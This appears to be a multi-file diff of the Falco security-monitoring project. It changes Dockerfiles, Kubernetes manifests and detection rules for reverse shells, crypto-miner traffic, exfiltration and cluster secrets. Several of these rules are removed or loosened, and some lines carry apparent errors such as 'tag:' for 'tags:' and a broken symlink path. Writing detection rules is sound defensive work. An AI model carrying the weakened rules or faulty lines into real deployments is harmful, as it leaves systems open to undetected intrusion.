+	&& curl -o gcc-5-base_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-5-base_5.5.0-12_amd64.deb \
+	&& curl -o gcc-5_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-5_5.5.0-12_amd64.deb \
+	&& curl -o libasan2_5.5.0-12_amd64.deb	https://s3.amazonaws.com/download.draios.com/dependencies/libasan2_5.5.0-12_amd64.deb \
+	&& curl -o libgcc-5-dev_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/libgcc-5-dev_5.5.0-12_amd64.deb \
+	&& curl -o libisl15_0.18-4_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/libisl15_0.18-4_amd64.deb \
+	&& curl -o libmpx0_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/libmpx0_5.5.0-12_amd64.deb \
 	&& dpkg -i cpp-5_5.5.0-12_amd64.deb gcc-5-base_5.5.0-12_amd64.deb gcc-5_5.5.0-12_amd64.deb libasan2_5.5.0-12_amd64.deb libgcc-5-dev_5.5.0-12_amd64.deb libisl15_0.18-4_amd64.deb libmpx0_5.5.0-12_amd64.deb \
 	&& rm -f cpp-5_5.5.0-12_amd64.deb gcc-5-base_5.5.0-12_amd64.deb gcc-5_5.5.0-12_amd64.deb libasan2_5.5.0-12_amd64.deb libgcc-5-dev_5.5.0-12_amd64.deb libisl15_0.18-4_amd64.deb libmpx0_5.5.0-12_amd64.deb
 
@@ -75,10 +75,10 @@ RUN rm -rf /usr/bin/clang \
 	&& ln -s /usr/bin/clang-7 /usr/bin/clang \
 	&& ln -s /usr/bin/llc-7 /usr/bin/llc
 
-RUN curl -s https://falco.org/repo/falcosecurity-3672BA8F.asc | apt-key add - \
-	&& echo "deb https://dl.bintray.com/falcosecurity/${VERSION_BUCKET} stable main" | tee -a /etc/apt/sources.list.d/falcosecurity.list \
-	&& apt-get update -y \
-	&& if [ "$FALCO_VERSION" = "latest" ]; then apt-get install -y --no-install-recommends falco; else apt-get install -y --no-install-recommends falco=${FALCO_VERSION}; fi \
+RUN curl -s https://s3.amazonaws.com/download.draios.com/DRAIOS-GPG-KEY.public | apt-key add - \
+	&& curl -s -o /etc/apt/sources.list.d/draios.list http://download.draios.com/$FALCO_REPOSITORY/deb/draios.list \
+	&& apt-get update \
+	&& apt-get install -y --no-install-recommends falco \
 	&& apt-get clean \
 	&& rm -rf /var/lib/apt/lists/*
 
@@ -93,13 +93,13 @@ RUN sed -e 's/time_format_iso_8601: false/time_format_iso_8601: true/' < /etc/fa
 RUN rm -df /lib/modules \
 	&& ln -s $HOST_ROOT/lib/modules /lib/modules
 
-# debian:stable head contains binutils 2.31, which generates
+# debian:unstable head contains binutils 2.31, which generates
 # binaries that are incompatible with kernels < 4.16. So manually
 # forcibly install binutils 2.30-22 instead.
-RUN curl -L -o binutils_2.30-22_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/binutils_2.30-22_amd64.deb \
-	&& curl -L -o libbinutils_2.30-22_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libbinutils_2.30-22_amd64.deb \
-	&& curl -L -o binutils-x86-64-linux-gnu_2.30-22_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/binutils-x86-64-linux-gnu_2.30-22_amd64.deb \
-	&& curl -L -o binutils-common_2.30-22_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/binutils-common_2.30-22_amd64.deb \
+RUN curl -s -o binutils_2.30-22_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/binutils_2.30-22_amd64.deb \
+	&& curl -s -o libbinutils_2.30-22_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/libbinutils_2.30-22_amd64.deb \
+	&& curl -s -o binutils-x86-64-linux-gnu_2.30-22_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/binutils-x86-64-linux-gnu_2.30-22_amd64.deb \
+	&& curl -s -o binutils-common_2.30-22_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/binutils-common_2.30-22_amd64.deb \
 	&& dpkg -i *binutils*.deb \
 	&& rm -f *binutils*.deb
 

docker/stable/docker-entrypoint.sh

@@ -25,11 +25,10 @@ if [[ -z "${SKIP_MODULE_LOAD}" ]]; then
 
     for i in "$HOST_ROOT/usr/src"/*
     do
-        base=$(basename "$i")
-        ln -s "$i" "/usr/src/$base"
+        ln -s "$i" "/usr/src/$i"
     done
 
-    /usr/bin/falco-driver-loader
+    /usr/bin/falco-probe-loader
 fi
 
 exec "$@"

docker/tester/Dockerfile

@@ -2,15 +2,15 @@ FROM fedora:31
 
 LABEL name="falcosecurity/falco-tester"
 LABEL usage="docker run -v /boot:/boot:ro -v /var/run/docker.sock:/var/run/docker.sock -v $PWD/..:/source -v $PWD/build:/build -e FALCO_VERSION=<current_falco_version> --name <name> falcosecurity/falco-tester test"
-LABEL maintainer="cncf-falco-dev@lists.cncf.io"
+LABEL maintainer="opensource@sysdig.com"
 
 ENV FALCO_VERSION=
 ENV BUILD_TYPE=release
 
-RUN dnf install -y python-pip python docker findutils jq unzip && dnf clean all
+RUN dnf install -y python2-pip python2 docker findutils jq unzip && dnf clean all
 ENV PATH="/root/.local/bin/:${PATH}"
-RUN pip install --user avocado-framework==69.0
-RUN pip install --user avocado-framework-plugin-varianter-yaml-to-mux==69.0
+RUN pip2 install --user avocado-framework==69.0
+RUN pip2 install --user avocado-framework-plugin-varianter-yaml-to-mux==69.0
 
 COPY ./root /
 

docker/tester/root/runners/deb.Dockerfile

@@ -1,5 +1,5 @@
 FROM ubuntu:18.04
-LABEL maintainer="cncf-falco-dev@lists.cncf.io"
+LABEL maintainer="opensource@sysdig.com"
 
 ARG FALCO_VERSION=
 RUN test -n FALCO_VERSION

docker/tester/root/runners/rpm.Dockerfile

@@ -1,6 +1,6 @@
 FROM centos:7
 
-LABEL maintainer="cncf-falco-dev@lists.cncf.io"
+LABEL maintainer="opensource@sysdig.com"
 
 ARG FALCO_VERSION=
 RUN test -n FALCO_VERSION

docker/tester/root/usr/bin/entrypoint

@@ -47,7 +47,7 @@ case "$CMD" in
 "test")
     if [ -z "$FALCO_VERSION" ]; then
         echo "Automatically figuring out Falco version."
-        FALCO_VERSION=$("$BUILD_DIR/$BUILD_TYPE/userspace/falco/falco" --version | head -n 1 | cut -d' ' -f3 | tr -d '\r')
+        FALCO_VERSION=$("$BUILD_DIR/$BUILD_TYPE/userspace/falco/falco" --version | cut -d' ' -f3 | tr -d '\r')
         echo "Falco version: $FALCO_VERSION"
     fi
     if [ -z "$FALCO_VERSION" ]; then

docker/tester/root/usr/bin/usage

@@ -1,7 +1,7 @@
 #!/usr/bin/env bash
 
-pythonversion=$(python -c 'import sys; version=sys.version_info[:3]; print("{0}.{1}.{2}".format(*version))')
-pipversion=$(pip --version | cut -d' ' -f 1,2,5,6)
+pythonversion=$(python2 -c 'import sys; version=sys.version_info[:3]; print("{0}.{1}.{2}".format(*version))')
+pipversion=$(pip2 --version | cut -d' ' -f 1,2,5,6)
 dockerversion=$(docker --version)
 avocadoversion=$(pip2 show avocado-framework | grep Version)
 avocadoversion=${avocadoversion#"Version: "}

examples/k8s_audit_config/audit-policy.yaml

@@ -56,17 +56,11 @@ rules:
     # The empty string "" can be used to select non-namespaced resources.
     namespaces: ["kube-system"]
 
-  # Log configmap changes in all other namespaces at the RequestResponse level.
+  # Log configmap and secret changes in all other namespaces at the RequestResponse level.
   - level: RequestResponse
     resources:
     - group: "" # core API group
-      resources: ["configmaps"]
-
-  # Log secret changes in all other namespaces at the Metadata level.
-  - level: Metadata
-    resources:
-    - group: "" # core API group
-      resources: ["secrets"]
+      resources: ["secrets", "configmaps"]
 
   # Log all other resources in core and extensions at the Request level.
   - level: Request

integrations/k8s-using-daemonset/falco-event-generator-deployment.yaml

@@ -1,4 +1,4 @@
-apiVersion: apps/v1
+apiVersion: extensions/v1beta1
 kind: Deployment
 metadata:
   name: falco-event-generator-deployment

integrations/k8s-using-daemonset/k8s-with-rbac/falco-account.yaml

@@ -7,7 +7,7 @@ metadata:
     role: security
 ---
 kind: ClusterRole
-apiVersion: rbac.authorization.k8s.io/v1
+apiVersion: rbac.authorization.k8s.io/v1beta1
 metadata:
   name: falco-cluster-role
   labels:
@@ -17,14 +17,11 @@ rules:
   - apiGroups: ["extensions",""]
     resources: ["nodes","namespaces","pods","replicationcontrollers","replicasets","services","daemonsets","deployments","events","configmaps"]
     verbs: ["get","list","watch"]
-  - apiGroups: ["apps"]
-    resources: ["daemonsets","deployments","replicasets","statefulsets"]
-    verbs: ["get","list","watch"]
   - nonResourceURLs: ["/healthz", "/healthz/*"]
     verbs: ["get"]
 ---
 kind: ClusterRoleBinding
-apiVersion: rbac.authorization.k8s.io/v1
+apiVersion: rbac.authorization.k8s.io/v1beta1
 metadata:
   name: falco-cluster-role-binding
   namespace: default

integrations/k8s-using-daemonset/k8s-with-rbac/falco-daemonset-configmap-slim.yaml

@@ -1,4 +1,4 @@
-apiVersion: apps/v1
+apiVersion: extensions/v1beta1
 kind: DaemonSet
 metadata:
   name: falco-daemonset
@@ -6,10 +6,6 @@ metadata:
     app: falco-example
     role: security
 spec:
-  selector:
-    matchLabels:
-      app: falco-example
-      role: security
   template:
     metadata:
       labels:
@@ -24,7 +20,7 @@ spec:
             privileged: true
           #env:
           #  - name: FALCOCTL_FALCO_VERSION
-          #    value: 0.21.0
+          #    value: 0.19.0
           #  - name: FALCOCTL_FALCO_PROBE_URL
           #    value:
           #  - name: FALCOCTL_FALCO_PROBE_REPO
@@ -35,7 +31,7 @@ spec:
               readOnly: true
       containers:
         - name: falco
-          image: falcosecurity/falco:0.21.0-slim
+          image: falcosecurity/falco:0.19.0-slim
           securityContext:
             privileged: true
 # Uncomment the 3 lines below to enable eBPF support for Falco.
@@ -43,9 +39,9 @@ spec:
 # Leave blank for the default probe location, or set to the path
 # of a precompiled probe.
 #          env:
-#          - name: FALCO_BPF_PROBE
+#          - name: BPF_PROBE
 #            value: ""
-          args: [ "/usr/bin/falco", "--cri", "/run/containerd/containerd.sock", "-K", "/var/run/secrets/kubernetes.io/serviceaccount/token", "-k", "https://$(KUBERNETES_SERVICE_HOST)", "-pk"]
+          args: [ "/usr/bin/falco", "--cri", "/host/run/containerd/containerd.sock", "-K", "/var/run/secrets/kubernetes.io/serviceaccount/token", "-k", "https://$(KUBERNETES_SERVICE_HOST)", "-pk"]
           volumeMounts:
             - mountPath: /host/var/run/docker.sock
               name: docker-socket

integrations/k8s-using-daemonset/k8s-with-rbac/falco-daemonset-configmap.yaml

@@ -1,4 +1,4 @@
-apiVersion: apps/v1
+apiVersion: extensions/v1beta1
 kind: DaemonSet
 metadata:
   name: falco-daemonset
@@ -6,10 +6,6 @@ metadata:
     app: falco-example
     role: security
 spec:
-  selector:
-    matchLabels:
-      app: falco-example
-      role: security
   template:
     metadata:
       labels:
@@ -27,9 +23,9 @@ spec:
 # Leave blank for the default probe location, or set to the path
 # of a precompiled probe.
 #          env:
-#          - name: FALCO_BPF_PROBE
+#          - name: BPF_PROBE
 #            value: ""
-          args: [ "/usr/bin/falco", "--cri", "/run/containerd/containerd.sock", "-K", "/var/run/secrets/kubernetes.io/serviceaccount/token", "-k", "https://$(KUBERNETES_SERVICE_HOST)", "-pk"]
+          args: [ "/usr/bin/falco", "--cri", "/host/run/containerd/containerd.sock", "-K", "/var/run/secrets/kubernetes.io/serviceaccount/token", "-k", "https://$(KUBERNETES_SERVICE_HOST)", "-pk"]
           volumeMounts:
             - mountPath: /host/var/run/docker.sock
               name: docker-socket

integrations/k8s-using-daemonset/k8s-without-rbac/falco-daemonset.yaml

@@ -1,4 +1,4 @@
-apiVersion: apps/v1
+apiVersion: extensions/v1beta1
 kind: DaemonSet
 metadata:
   name: falco
@@ -6,11 +6,6 @@ metadata:
     name: falco-daemonset
     app: demo
 spec:
-  selector:
-    matchLabels:
-      name: falco
-      app: demo
-      role: security
   template:
     metadata:
       labels:
@@ -23,7 +18,7 @@ spec:
           image: falcosecurity/falco:latest
           securityContext:
             privileged: true
-          args: [ "/usr/bin/falco", "--cri", "/run/containerd/containerd.sock", "-K", "/var/run/secrets/kubernetes.io/serviceaccount/token", "-k", "https://kubernetes.default", "-pk", "-o", "json_output=true", "-o", "program_output.enabled=true", "-o",  "program_output.program=jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/see_your_slack_team/apps_settings_for/a_webhook_url"]
+          args: [ "/usr/bin/falco", "--cri", "/host/run/containerd/containerd.sock", "-K", "/var/run/secrets/kubernetes.io/serviceaccount/token", "-k", "https://kubernetes.default", "-pk", "-o", "json_output=true", "-o", "program_output.enabled=true", "-o",  "program_output.program=jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/see_your_slack_team/apps_settings_for/a_webhook_url"]
           volumeMounts:
             - mountPath: /host/var/run/docker.sock
               name: docker-socket

integrations/k8s-using-deployment/falco-event-generator-deployment.yaml

@@ -1,4 +1,4 @@
-apiVersion: apps/v1
+apiVersion: extensions/v1beta1
 kind: Deployment
 metadata:
   name: falco-event-generator-deployment

integrations/k8s-using-deployment/k8s-with-rbac/falco-k8s-audit-account.yaml

@@ -7,7 +7,7 @@ metadata:
     role: security
 ---
 kind: ClusterRole
-apiVersion: rbac.authorization.k8s.io/v1
+apiVersion: rbac.authorization.k8s.io/v1beta1
 metadata:
   name: falco-cluster-role
   labels:
@@ -17,14 +17,11 @@ rules:
   - apiGroups: ["extensions",""]
     resources: ["nodes","namespaces","pods","replicationcontrollers","replicasets","services","daemonsets","deployments","events","configmaps"]
     verbs: ["get","list","watch"]
-  - apiGroups: ["apps"]
-    resources: ["daemonsets","deployments","replicasets","statefulsets"]
-    verbs: ["get","list","watch"]
   - nonResourceURLs: ["/healthz", "/healthz/*"]
     verbs: ["get"]
 ---
 kind: ClusterRoleBinding
-apiVersion: rbac.authorization.k8s.io/v1
+apiVersion: rbac.authorization.k8s.io/v1beta1
 metadata:
   name: falco-cluster-role-binding
   namespace: default

integrations/k8s-using-deployment/k8s-with-rbac/falco-k8s-audit-deployment.yaml

@@ -1,4 +1,4 @@
-apiVersion: apps/v1
+apiVersion: extensions/v1beta1
 kind: Deployment
 metadata:
   name: falco-k8s-audit

rules/falco_rules.yaml

@@ -450,7 +450,7 @@
     a shell configuration file has been modified (user=%user.name command=%proc.cmdline pcmdline=%proc.pcmdline file=%fd.name container_id=%container.id image=%container.image.repository)
   priority:
     WARNING
-  tags: [file, mitre_persistence]
+  tag: [file, mitre_persistence]
 
 # This rule is not enabled by default, as there are many legitimate
 # readers of shell config files. If you want to enable it, modify the
@@ -472,7 +472,7 @@
     a shell configuration file was read by a non-shell program (user=%user.name command=%proc.cmdline file=%fd.name container_id=%container.id image=%container.image.repository)
   priority:
     WARNING
-  tags: [file, mitre_discovery]
+  tag: [file, mitre_discovery]
 
 - macro: consider_all_cron_jobs
   condition: (never_true)
@@ -488,7 +488,7 @@
     file=%fd.name container_id=%container.id container_name=%container.name image=%container.image.repository:%container.image.tag)
   priority:
     NOTICE
-  tags: [file, mitre_persistence]
+  tag: [file, mitre_persistence]
 
 # Use this to test whether the event occurred within a container.
 
@@ -1361,7 +1361,7 @@
   condition: >
     root_dir and evt.dir = < and open_write
     and not fd.name in (known_root_files)
-    and not fd.directory pmatch (known_root_directories)
+    and not fd.directory in (known_root_directories)
     and not exe_running_docker_save
     and not gugent_writing_guestagent_log
     and not dse_writing_tmp
@@ -1544,13 +1544,13 @@
     an attempt to change a program/thread\'s namespace (commonly done
     as a part of creating a container) by calling setns.
   condition: >
-    evt.type=setns and evt.dir=<
-    and not (container.id=host and proc.name in (docker_binaries, k8s_binaries, lxd_binaries, nsenter))
-    and not proc.name in (sysdigcloud_binaries, sysdig, calico, oci-umount, cilium-cni, network_plugin_binaries)
+    evt.type = setns
+    and not proc.name in (docker_binaries, k8s_binaries, lxd_binaries, sysdigcloud_binaries,
+                          sysdig, nsenter, calico, oci-umount, cilium-cni, network_plugin_binaries)
     and not proc.name in (user_known_change_thread_namespace_binaries)
     and not proc.name startswith "runc"
     and not proc.cmdline startswith "containerd"
-    and not proc.pname in (sysdigcloud_binaries, hyperkube, kubelet)
+    and not proc.pname in (sysdigcloud_binaries)
     and not python_running_sdchecks
     and not java_running_sdjagent
     and not kubelet_running_loopback
@@ -1561,9 +1561,9 @@
     and not user_known_change_thread_namespace_activities
   output: >
     Namespace change (setns) by unexpected program (user=%user.name command=%proc.cmdline
-    parent=%proc.pname %container.info container_id=%container.id image=%container.image.repository:%container.image.tag)
+    parent=%proc.pname %container.info container_id=%container.id image=%container.image.repository)
   priority: NOTICE
-  tags: [process, mitre_privilege_escalation, mitre_lateral_movement]
+  tags: [process]
 
 # The binaries in this list and their descendents are *not* allowed
 # spawn shells. This includes the binaries spawning shells directly as
@@ -2007,27 +2007,14 @@
   condition: >
     (fd.sockfamily = ip and (system_procs or proc.name in (shell_binaries)))
     and (inbound_outbound)
-    and not proc.name in (known_system_procs_network_activity_binaries)
+    and not proc.name in (systemd, hostid, id)
     and not login_doing_dns_lookup
-    and not user_expected_system_procs_network_activity_conditions
   output: >
     Known system binary sent/received network traffic
     (user=%user.name command=%proc.cmdline connection=%fd.name container_id=%container.id image=%container.image.repository)
   priority: NOTICE
   tags: [network, mitre_exfiltration]
 
-# This list allows easily whitelisting system proc names that are
-# expected to communicate on the network.
-- list: known_system_procs_network_activity_binaries
-  items: [systemd, hostid, id]
-
-# This macro allows specifying conditions under which a system binary
-# is allowed to communicate on the network. For instance, only specific
-# proc.cmdline values could be allowed to be more granular in what is
-# allowed.
-- macro: user_expected_system_procs_network_activity_conditions
-  condition: (never_true)
-
 # When filled in, this should look something like:
 # (proc.env contains "HTTP_PROXY=http://my.http.proxy.com ")
 # The trailing space is intentional so avoid matching on prefixes of
@@ -2493,7 +2480,7 @@
     Shell history had been deleted or renamed (user=%user.name type=%evt.type command=%proc.cmdline fd.name=%fd.name name=%evt.arg.name path=%evt.arg.path oldpath=%evt.arg.oldpath %container.info)
   priority:
     WARNING
-  tags: [process, mitre_defense_evasion]
+  tag: [process, mitre_defense_evation]
 
 # This rule is deprecated and will/should never be triggered. Keep it here for backport compatibility.
 # Rule Delete or rename shell history is the preferred rule to use now.
@@ -2506,7 +2493,7 @@
     Shell history had been deleted or renamed (user=%user.name type=%evt.type command=%proc.cmdline fd.name=%fd.name name=%evt.arg.name path=%evt.arg.path oldpath=%evt.arg.oldpath %container.info)
   priority:
     WARNING
-  tags: [process, mitre_defense_evasion]
+  tag: [process, mitre_defense_evation]
 
 - macro: consider_all_chmods
   condition: (always_true)
@@ -2528,7 +2515,7 @@
     command=%proc.cmdline container_id=%container.id container_name=%container.name image=%container.image.repository:%container.image.tag)
   priority:
     NOTICE
-  tags: [process, mitre_persistence]
+  tag: [process, mitre_persistence]
 
 - list: exclude_hidden_directories
   items: [/root/.cassandra]
@@ -2550,7 +2537,7 @@
     file=%fd.name newpath=%evt.arg.newpath container_id=%container.id container_name=%container.name image=%container.image.repository:%container.image.tag)
   priority:
     NOTICE
-  tags: [file, mitre_persistence]
+  tag: [file, mitre_persistence]
 
 - list: remote_file_copy_binaries
   items: [rsync, scp, sftp, dcp]
@@ -2658,18 +2645,11 @@
   condition: (fd.sport in (miner_ports) and fd.sip.name in (miner_domains))
 
 - macro: net_miner_pool
-  condition: (evt.type in (sendto, sendmsg) and evt.dir=< and (fd.net != "127.0.0.0/8" and not fd.snet in (rfc_1918_addresses)) and ((minerpool_http) or (minerpool_https) or (minerpool_other)))
+  condition: (evt.type in (sendto, sendmsg) and evt.dir=< and ((minerpool_http) or (minerpool_https) or (minerpool_other)))
 
-- macro: trusted_images_query_miner_domain_dns
-  condition: (container.image.repository endswith "sysdig/agent" or container.image.repository endswith "falcosecurity/falco")
-  append: false
-
-# The rule is disabled by default.
-# Note: falco will send DNS request to resolve miner pool domain which may trigger alerts in your environment.
 - rule: Detect outbound connections to common miner pool ports
   desc: Miners typically connect to miner pools on common ports.
-  condition: net_miner_pool and not trusted_images_query_miner_domain_dns
-  enabled: false
+  condition: net_miner_pool
   output: Outbound connection to IP/Port flagged by cryptoioc.ch (command=%proc.cmdline port=%fd.rport ip=%fd.rip container=%container.info image=%container.image.repository)
   priority: CRITICAL
   tags: [network, mitre_execution]
@@ -2685,10 +2665,10 @@
   items: [docker, kubectl, crictl]
 
 # Whitelist for known docker client binaries run inside container
-# - k8s.gcr.io/fluentd-gcp-scaler in GCP/GKE
+# - k8s.gcr.io/fluentd-gcp-scaler in GCP/GKE 
 - macro: user_known_k8s_client_container
   condition: (k8s.ns.name="kube-system" and container.image.repository=k8s.gcr.io/fluentd-gcp-scaler)
- 
+  
 - rule: The docker client is executed in a container
   desc: Detect a k8s client tool executed inside a container
   condition: spawned_process and container and not user_known_k8s_client_container and proc.name in (k8s_client_binaries)
@@ -2712,93 +2692,7 @@
   output: Packet socket was created in a container (user=%user.name command=%proc.cmdline socket_info=%evt.args container_id=%container.id container_name=%container.name image=%container.image.repository:%container.image.tag)
   priority: NOTICE
   tags: [network, mitre_discovery]
- 
-# Change to (always_true) to enable rule 'Network connection outside local subnet'
-- macro: enabled_rule_network_only_subnet
-  condition: (never_true)
-
-# Images that are allowed to have outbound traffic
-- list: images_allow_network_outside_subnet
-  items: []
-
-# Namespaces where the rule is enforce
-- list: namespace_scope_network_only_subnet
-  items: []
-
-- macro: network_local_subnet
-  condition: >
-    fd.rnet in (rfc_1918_addresses) or
-    fd.ip = "0.0.0.0" or 
-    fd.net = "127.0.0.0/8"
-
-# # How to test:
-# # Change macro enabled_rule_network_only_subnet to condition: always_true
-# # Add 'default' to namespace_scope_network_only_subnet
-# # Run:
-# kubectl run --generator=run-pod/v1 -n default -i --tty busybox --image=busybox --rm -- wget google.com -O /var/google.html
-# # Check logs running
-
-- rule: Network Connection outside Local Subnet
-  desc: Detect traffic to image outside local subnet.
-  condition: >
-    enabled_rule_network_only_subnet and
-    inbound_outbound and
-    container and
-    not network_local_subnet and
-    k8s.ns.name in (namespace_scope_network_only_subnet)
-  output: >
-    Network connection outside local subnet
-    (command=%proc.cmdline connection=%fd.name user=%user.name container_id=%container.id
-     image=%container.image.repository namespace=%k8s.ns.name
-     fd.rip.name=%fd.rip.name fd.lip.name=%fd.lip.name fd.cip.name=%fd.cip.name fd.sip.name=%fd.sip.name)
-  priority: WARNING
-  tags: [network]
-
-- macro: allowed_port
-  condition: (never_true)
-
-- list: allowed_image
-  items: [] # add image to monitor, i.e.: bitnami/nginx
-
-- list: authorized_server_binaries
-  items: []  # add binary to allow, i.e.: nginx
-
-- list: authorized_server_port
-  items: [] # add port to allow, i.e.: 80
-
-# # How to test:
-# kubectl run --image=nginx nginx-app --port=80 --env="DOMAIN=cluster"
-# kubectl expose deployment nginx-app --port=80 --name=nginx-http --type=LoadBalancer
-# # On minikube:
-# minikube service nginx-http
-# # On general K8s:
-# kubectl get services
-# kubectl cluster-info
-# # Visit the Nginx service and port, should not fire.
-# # Change rule to different port, then different process name, and test again that it fires.
-
-- rule: Outbound or Inbound Traffic not to Authorized Server Process and Port
-  desc: Detect traffic that is not to authorized server process and port.
-  condition: >
-    allowed_port and
-    inbound_outbound and
-    container and
-    container.image.repository in (allowed_image) and
-    not proc.name in (authorized_server_binary) and
-    not fd.sport in (authorized_server_port)
-  output: >
-    Network connection outside authorized port and binary
-    (command=%proc.cmdline connection=%fd.name user=%user.name container_id=%container.id 
-    image=%container.image.repository)
-  priority: WARNING
-  tags: [network]
-
-- rule: Redirect STDOUT/STDIN to Network Connection in Container
-  desc: Detect redirecting stdout/stdin to network connection in container (potential reverse shell).
-  condition: evt.type=dup and evt.dir=> and container and fd.num in (0, 1, 2) and fd.type in ("ipv4", "ipv6")
-  output: >
-    Redirect stdout/stdin to network connection (user=%user.name %container.info process=%proc.name parent=%proc.pname cmdline=%proc.cmdline terminal=%proc.tty container_id=%container.id image=%container.image.repository fd.name=%fd.name fd.num=%fd.num fd.type=%fd.type fd.sip=%fd.sip)
-  priority: WARNING
+  
 
 # Application rules have moved to application_rules.yaml. Please look
 # there if you want to enable them by adding to

rules/k8s_audit_rules.yaml

@@ -102,9 +102,6 @@
 - macro: role
   condition: ka.target.resource=roles
 
-- macro: secret
-  condition: ka.target.resource=secrets
-
 - macro: health_endpoint
   condition: ka.uri=/healthz
 
@@ -228,7 +225,7 @@
 # Detect creating a service account in the kube-system/kube-public namespace
 - rule: Service Account Created in Kube Namespace
   desc: Detect any attempt to create a serviceaccount in the kube-system or kube-public namespaces
-  condition: kevt and serviceaccount and kcreate and ka.target.namespace in (kube-system, kube-public) and response_successful
+  condition: kevt and serviceaccount and kcreate and ka.target.namespace in (kube-system, kube-public)
   output: Service account created in kube namespace (user=%ka.user.name serviceaccount=%ka.target.name ns=%ka.target.namespace)
   priority: WARNING
   source: k8s_audit
@@ -404,22 +401,6 @@
   source: k8s_audit
   tags: [k8s]
 
-- rule: K8s Secret Created
-  desc: Detect any attempt to create a secret. Service account tokens are excluded.
-  condition: (kactivity and kcreate and secret and ka.target.namespace!=kube-system and non_system_user and response_successful)
-  output: K8s Secret Created (user=%ka.user.name secret=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
-  priority: INFO
-  source: k8s_audit
-  tags: [k8s]
-
-- rule: K8s Secret Deleted
-  desc: Detect any attempt to delete a secret Service account tokens are excluded.
-  condition: (kactivity and kdelete and secret and ka.target.namespace!=kube-system and non_system_user and response_successful)
-  output: K8s Secret Deleted (user=%ka.user.name secret=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
-  priority: INFO
-  source: k8s_audit
-  tags: [k8s]
-
 # This rule generally matches all events, and as a result is disabled
 # by default. If you wish to enable these events, modify the
 # following macro.
@@ -437,118 +418,3 @@
   priority: DEBUG
   source: k8s_audit
   tags: [k8s]
-
-
-# This macro disables following rule, change to k8s_audit_never_true to enable it
-- macro: allowed_full_admin_users
-  condition: (k8s_audit_always_true)
-
-# This list includes some of the default user names for an administrator in several K8s installations
-- list: full_admin_k8s_users
-  items: ["admin", "kubernetes-admin",  "kubernetes-admin@kubernetes", "kubernetes-admin@cluster.local", "minikube-user"]
-
-# This rules detect an operation triggered by an user name that is 
-# included in the list of those that are default administrators upon 
-# cluster creation. This may signify a permission setting too broader. 
-# As we can't check for role of the user on a general ka.* event, this 
-# may or may not be an administrator. Customize the full_admin_k8s_users 
-# list to your needs, and activate at your discrection.
-
-# # How to test:
-# # Execute any kubectl command connected using default cluster user, as:
-# kubectl create namespace rule-test
-
-- rule: Full K8s Administrative Access
-  desc: Detect any k8s operation by a user name that may be an administrator with full access.
-  condition: >
-    kevt 
-    and non_system_user 
-    and ka.user.name in (admin_k8s_users) 
-    and not allowed_full_admin_users
-  output: K8s Operation performed by full admin user (user=%ka.user.name target=%ka.target.name/%ka.target.resource verb=%ka.verb uri=%ka.uri resp=%ka.response.code)
-  priority: WARNING
-  source: k8s_audit
-  tags: [k8s]
-
-
-
-- macro: ingress
-  condition: ka.target.resource=ingresses
-
-- macro: ingress_tls
-  condition: (jevt.value[/requestObject/spec/tls] exists)
-
-# # How to test:
-# # Create an ingress.yaml file with content:
-# apiVersion: networking.k8s.io/v1beta1
-# kind: Ingress
-# metadata:
-#   name: test-ingress
-#   annotations:
-#     nginx.ingress.kubernetes.io/rewrite-target: /
-# spec:
-#   rules:
-#   - http:
-#       paths:
-#       - path: /testpath
-#         backend:
-#           serviceName: test
-#           servicePort: 80
-# # Execute: kubectl apply -f ingress.yaml
-
-- rule: Ingress Object without TLS Certificate Created
-  desc: Detect any attempt to create an ingress without TLS certification.
-  condition: >
-    (kactivity and kcreate and ingress and response_successful and not ingress_tls)
-  output: >
-    K8s Ingress Without TLS Cert Created (user=%ka.user.name ingress=%ka.target.name
-    namespace=%ka.target.namespace)
-  source: k8s_audit    
-  priority: WARNING
-  tags: [k8s, network]
-
-
-
-- macro: node
-  condition: ka.target.resource=nodes
-
-- macro: allow_all_k8s_nodes
-  condition: (k8s_audit_always_true)
-
-- list: allowed_k8s_nodes
-  items: []
-
-# # How to test:
-# # Create a Falco monitored cluster with Kops
-# # Increase the number of minimum nodes with:
-# kops edit ig nodes
-# kops apply --yes
-
-- rule: Untrusted Node Successfully Joined the Cluster
-  desc: >
-    Detect a node successfully joined the cluster outside of the list of allowed nodes.
-  condition: >
-    kevt and node 
-    and kcreate 
-    and response_successful 
-    and not allow_all_k8s_nodes 
-    and not ka.target.name in (allowed_k8s_nodes)
-  output: Node not in allowed list successfully joined the cluster (user=%ka.user.name node=%ka.target.name)
-  priority: ERROR
-  source: k8s_audit
-  tags: [k8s]
-
-- rule: Untrusted Node Unsuccessfully Tried to Join the Cluster
-  desc: >
-    Detect an unsuccessful attempt to join the cluster for a node not in the list of allowed nodes.
-  condition: >
-    kevt and node 
-    and kcreate 
-    and not response_successful 
-    and not allow_all_k8s_nodes 
-    and not ka.target.name in (allowed_k8s_nodes)
-  output: Node not in allowed list tried unsuccessfully to join the cluster  (user=%ka.user.name node=%ka.target.name reason=%ka.response.reason)
-  priority: WARNING
-  source: k8s_audit
-  tags: [k8s]
-

scripts/CMakeLists.txt

@@ -1,5 +1,5 @@
 #
-# Copyright (C) 2020 The Falco Authors.
+# Copyright (C) 2019 The Falco Authors.
 #
 #
 # Licensed under the Apache License, Version 2.0 (the "License");
@@ -14,24 +14,16 @@
 # See the License for the specific language governing permissions and
 # limitations under the License.
 #
-
 configure_file(debian/postinst.in debian/postinst)
-configure_file(debian/postrm.in debian/postrm)
 configure_file(debian/prerm.in debian/prerm)
 
